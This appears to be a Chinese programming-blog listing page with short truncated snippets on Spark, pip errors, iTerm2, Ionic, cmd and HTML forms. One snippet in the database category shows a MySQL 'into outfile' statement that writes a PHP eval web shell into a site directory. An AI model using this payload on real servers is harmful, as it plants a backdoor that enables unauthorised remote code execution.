1.spark-shell交互式编程 (1) 该系总共有多少学生 scala> val lines = sc.textFile("file:///usr/local/spark/sparklab/Data01.txt") lines: org.apache.spark.rdd.RDD[String] ...
分类:
其他好文 时间:
2020-02-07 22:19:06
阅读次数:
182
在win10上pip安装ujson报错 之前一直用的是mac本,但由于疫情问题,最近不得不用win10系统来进行python开发,在使用pip安装依赖包ujson时,遇到了问题,如下: 问题很明显:Microsoft Visual C++ 9.0 is required。意思是缺少编译ujson的C ...
分类:
编程语言 时间:
2020-02-07 13:12:17
阅读次数:
289
1.该系总共有多少学生 val lines = sc.textFile("file:///usr/local/spark/sparksqldata/Data01.txt") val par = lines.map(row=>row.split(",")(0)) val distinct_par = ...
分类:
系统相关 时间:
2020-02-06 22:44:07
阅读次数:
106
To jump between words and start/end of lines in iTerm2 follow these steps: iTerm2 -> Preferences (? + ,) Open the “Keys” tab Add the following Global ...
分类:
移动开发 时间:
2020-02-06 12:47:35
阅读次数:
92
按官方文档 https://ionicframework.com/docs/api/infinite-scroll-content loadingSpinner有如下可选值: bubbles circles circular crescent dots lines(默认) lines-small ...
分类:
其他好文 时间:
2020-02-06 12:30:41
阅读次数:
94
通过cmd修改注册表(设置cmd窗口的大小) 设置cmd的窗口 mode: modem设置系统设备,主要是lpt1, com1/2, con:启动时设置窗口大小: cmd /k "mode con: cols=120 lines=40"或 cmd /k "mode 120,40"经典的尺寸是wh=1 ...
分类:
其他好文 时间:
2020-02-05 13:16:08
阅读次数:
293
lines terminated by xxx 以xxx为结尾:select '<?php @eval($_ POST[crow]);?>' into outfile 'C:\pbpstudy\PHPTutorilWWW.crow.pbp’ linesterminated by 0x363636;最 ...
分类:
数据库 时间:
2020-02-03 22:49:41
阅读次数:
110
"OK, you are not too bad, em... But you can never pass the next test." feng5166 says. "I will tell you an odd number N, and then N integers. There wil ...
分类:
其他好文 时间:
2020-02-02 13:45:34
阅读次数:
51
下面的代码实现的有:单行文本、多行文本、复选框(checkbox)、单选按钮(radio)、选择框(selected) 1 <!DOCTYPE html> 2 <html> 3 <head> 4 <meta charset="utf-8"> 5 <title></title> 6 <script s ...
分类:
其他好文 时间:
2020-02-02 01:44:10
阅读次数:
112
下面的代码给出了lightningchart JS一个基本线性图的使用范例。线性图在笛卡尔坐标上绘制,表现两个变量之间的关系。直线段连接成数据点,线性图将信息作为这些数据点显示出来。一般用来显示数据变化或展示数据集的趋势。 此类型的图不包含可视的数据点“标记”,仅包含所有数据点之间的连续连接线。 此 ...
分类:
Web程序 时间:
2020-01-29 21:58:29
阅读次数:
105